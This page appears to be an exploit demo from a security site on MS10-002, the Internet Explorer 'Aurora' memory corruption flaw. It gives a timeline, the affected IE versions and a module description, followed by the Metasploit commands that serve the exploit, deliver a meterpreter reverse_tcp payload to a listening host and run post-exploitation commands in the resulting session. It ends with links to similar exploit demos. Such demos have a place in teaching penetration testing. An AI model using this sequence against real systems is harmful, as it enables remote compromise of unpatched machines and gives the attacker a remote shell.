aka wow on ZATAZ.com
MS10-002 : Internet Explorer Aurora Memory Corruption
Timeline :
Vulnerability learned by Microsoft the 2010-01-13
Metasploit PoC provided by hdm the 2010-01-15
Exploit-DB PoC provided by Ahmed Obied the 2010-01-17
Microsoft patch “KB978207″ provided the 2010-01-21
PoC provided by :
unknown
hdm
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB978207
Description :
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
Commands :
use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
sysinfo
getuid
ipconfig
- MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo
- MS12-004 Windows Media Remote Code Execution Metasploit Demo
- MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo
- MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo
- MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo
- EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation
- Metasploit Exploitation Scenarios – Scenario 1
- MS11-011 : Windows UAC Bypass 0day
- MS10-046 : Microsoft Windows Shell LNK Execution
- MS10-090 : Microsoft Internet Explorer CSS Tags Memory Corruption